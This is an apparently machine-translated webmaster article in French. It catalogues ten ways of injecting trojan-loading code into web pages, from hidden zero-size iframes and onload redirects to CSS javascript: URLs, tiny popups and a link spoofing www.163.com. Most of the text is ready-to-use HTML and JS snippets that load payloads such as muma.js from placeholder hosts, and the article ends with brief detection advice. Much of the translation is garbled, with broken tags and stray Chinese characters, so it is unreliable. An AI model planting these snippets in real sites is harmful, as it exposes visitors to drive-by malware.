1: Cadre Hang Horse
<iframe src = AddressWidth = 0 height = 0> </ iframe>
Parmi eux, des liens de site Web malveillant peuvent être entrés à "l'adresse"
Deux: le fichier JS Hang
Tant qu'il s'agit d'un fichier JS, il peut être modifié malicieusement et un code malveillant peut être suspendu. Généralement, le code JS référencé par l'ensemble du site est le plus susceptible d'être accroché avec des chevaux de Troie. Nous pouvons vérifier la gauche ou le bas du code JS. Les mauvaises personnes aiment masquer le code malveillant et le code normal avec de nombreux espaces ou rendement du chariot, nous devons donc vérifier si la page du code JS est délibérément allongée, etc.
Trois: cryptage de déformation JS
<Script lingots = "jscript.encode" src = http: //www.xxx.com/muma.txt> </ script>
Muma.txt peut être changé en tout suffixe
Quatre: le corps est accroché à cheval
<body onload = "window.location = 'adresse';"> </ body>
Cinq: cacher un cheval invisible
top.document.body.innerhtml = top.document.body.innerhtml + '/ r / n <iframe src = "http://www.xxx.com/muma.htm/"> </ iframe>';
Six: CSS Hang Horse
corps {
Background-Image: url ('javascript: document.write ("<script src = http: //www.xxx.net/muma.js> </cript>")')}
Cette méthode est plus impitoyable et difficile à trouver.
Sept: Jaja Hang Horse
<Script Language = JavaScript>
window.open ("Address", "", "Toolbar = no, location = no, répertoires = no, status = no, menuBar = no, scro llbars = no, width = 1, height = 1");
</cript>
Huit: déguisement de l'image
<html>
<iframe src = "博题题题题" height = 0 width = 0> </ iframe>
<img src = "Adresse d'image"> </ Center>
</html>
Neuf: appel déguisé
<FrameSet Rows = "444,0" Cols = "*">
<frame src = "ouvrir la page Web" frameborder = "no" Scrolling = "auto" noresiser marginwidth = "0" margingheight = "0">
<frame src = "net Horse Address" frameborder = "no" Scrolling = "no" noresiser marginwidth = "0" margingheight = "0">
</ FrameSet>
Dix: Deception avancée
<a href = "http://www.163.com (confondu l'adresse de connexion, afficher cette adresse pointe vers l'adresse de trojan)" onMouseOver = "www_163_com (); return true;"> quoi afficher sur la page </a>
<Script linguisse = "javascript">
fonction www_163_com ()
{
var url = "博题题题题题题";
Open (URL, "NewWindow", "Toolbar = Non, Location = Non, répertoires = Non, Status = Non, MenUbar = Non, Scrollbars = Non, Resizable = Non, CopyHistory = Oui, largeur = 800, hauteur = 600, gauche = 10, top = 10");
}
</cript>
Comment découvrir le comportement ci-dessus? Si plusieurs pages ont des codes de cheval, des outils de remplacement par lots sont nécessaires. Il est recommandé de l'utiliser.
Quelques téléchargements de la chaîne serveur du nouveau site Webmaster (plus de logiciels peuvent être téléchargés sur s.vevb.com)